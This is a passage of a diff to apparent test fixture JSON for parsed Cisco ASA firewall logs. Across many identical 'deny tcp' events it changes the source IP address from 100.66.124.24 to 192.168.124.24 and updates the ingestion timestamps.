"100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18306,7 +18306,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18315,8 +18315,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095186260Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605057400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18352,8 +18352,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18387,7 +18387,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18396,8 +18396,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095188184Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605062800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18433,8 +18433,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18468,7 +18468,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18477,8 +18477,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095190150Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605068300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18514,8 +18514,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18549,7 +18549,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18558,8 +18558,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095191962Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605073700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18595,8 +18595,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18630,7 +18630,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18639,8 +18639,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095193803Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605079100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18676,8 +18676,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18711,7 +18711,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18720,8 +18720,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095195616Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605084400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18757,8 +18757,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18792,7 +18792,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18801,8 +18801,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095197461Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605089800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18838,8 +18838,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18873,7 +18873,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18882,8 +18882,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095199866Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605095300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18919,8 +18919,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18954,7 +18954,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18963,8 +18963,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095201688Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605100800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19000,8 +19000,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19035,7 +19035,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19044,8 +19044,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095203516Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605106300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19081,8 +19081,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19116,7 +19116,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19125,8 +19125,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095205687Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605112300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19162,8 +19162,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19197,7 +19197,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19206,8 +19206,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095207685Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605116Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19243,8 +19243,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19278,7 +19278,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19287,8 +19287,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095209522Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605120300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19324,8 +19324,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19359,7 +19359,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19368,8 +19368,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095211339Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605125200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19405,8 +19405,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19440,7 +19440,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19449,8 +19449,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095213154Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605129700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19486,8 +19486,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19521,7 +19521,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19530,8 +19530,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095214956Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605133300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19567,8 +19567,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19602,7 +19602,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19611,8 +19611,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095216800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605137600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19648,8 +19648,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19683,7 +19683,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19692,8 +19692,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095218795Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605143100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19729,8 +19729,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19764,7 +19764,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19773,8 +19773,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095220690Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605148400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19810,8 +19810,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19845,7 +19845,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19854,8 +19854,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095222507Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605152Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19891,8 +19891,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -19926,7 +19926,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -19935,8 +19935,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095224316Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605156200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -19972,8 +19972,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20007,7 +20007,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20016,8 +20016,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095226133Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605159800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20053,8 +20053,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20088,7 +20088,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20097,8 +20097,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095227944Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605164400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20134,8 +20134,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20169,7 +20169,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20178,8 +20178,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095229910Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605169700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20215,8 +20215,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20250,7 +20250,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20259,8 +20259,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095231714Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605174Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20296,8 +20296,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20331,7 +20331,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20340,8 +20340,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095233535Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605179400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20377,8 +20377,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20412,7 +20412,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20421,8 +20421,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095235326Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605184800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20458,8 +20458,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20493,7 +20493,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20502,8 +20502,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095237123Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605190100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20539,8 +20539,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20574,7 +20574,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20583,8 +20583,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095239018Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605195600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20620,8 +20620,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20655,7 +20655,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20664,8 +20664,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095240855Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605201Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20701,8 +20701,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20736,7 +20736,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20745,8 +20745,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095242666Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605206400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20782,8 +20782,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20817,7 +20817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20826,8 +20826,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095244498Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" 